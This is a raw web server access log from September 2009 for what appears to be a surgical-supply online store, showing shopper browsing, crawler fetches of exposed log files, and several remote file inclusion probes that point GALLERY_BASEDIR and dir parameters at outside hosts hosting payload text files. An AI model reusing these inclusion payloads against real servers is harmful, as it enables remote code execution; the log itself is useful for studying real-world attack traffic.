98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:10 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:21 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:21 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG HTTP/1.1" 200 38850 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:51:24 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.151 - - [23/Sep/2009:00:50:56 -0400] "GET /logs/access_log.Q109072200 HTTP/1.1" 200 5101774 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [23/Sep/2009:00:51:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.125.74.87 - - [23/Sep/2009:00:51:44 -0400] "GET /logs/error_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:51:44 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:51:44 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:51:56 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:51:56 -0400] "GET /logs/error_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:51:56 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.125.74.87 - - [23/Sep/2009:00:51:58 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.125.74.87 - - [23/Sep/2009:00:52:00 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja/media/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
98.195.56.213 - - [23/Sep/2009:00:52:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E400168C200287705Z+M37+ENG HTTP/1.1" 200 44463 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.151 - - [23/Sep/2009:00:52:08 -0400] "GET /logs/access_log.Q109062900 HTTP/1.1" 200 5053948 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.195.56.213 - - [23/Sep/2009:00:53:05 -0400] "GET /images/pf-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532E400168C200287705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:53:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:53:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E400168C200287705Z+M37+ENG HTTP/1.1" 200 36967 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C00288200E43705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:54:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E440198B200A65705Z+M37+ENG HTTP/1.1" 200 36967 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532E400168C200287705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:54:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E490F78C200D09705Z+M37+ENG HTTP/1.1" 200 36967 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532E440198B200A65705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:54:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E430B08D200EEA705Z+M37+ENG HTTP/1.1" 200 36967 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532E490F78C200D09705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:55:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532E4901A8F200E27705Z+M37+ENG HTTP/1.1" 200 38857 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532E430B08D200EEA705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.151 - - [23/Sep/2009:00:54:54 -0400] "GET /logs/access_log.Q109062300 HTTP/1.1" 200 5026682 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.115.58.73 - - [23/Sep/2009:00:55:40 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:40 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:40 -0400] "GET /logs/error_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:52 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:53 -0400] "GET /logs/error_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:53 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:53 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:00:55:54 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
61.100.5.136 - - [23/Sep/2009:00:55:57 -0400] "GET /logs/access_log.Q109082400/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
113.22.190.146 - - [23/Sep/2009:00:56:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:26 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture HTTP/1.1" 200 38017 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:29 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
113.22.190.146 - - [23/Sep/2009:00:56:30 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):picture" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
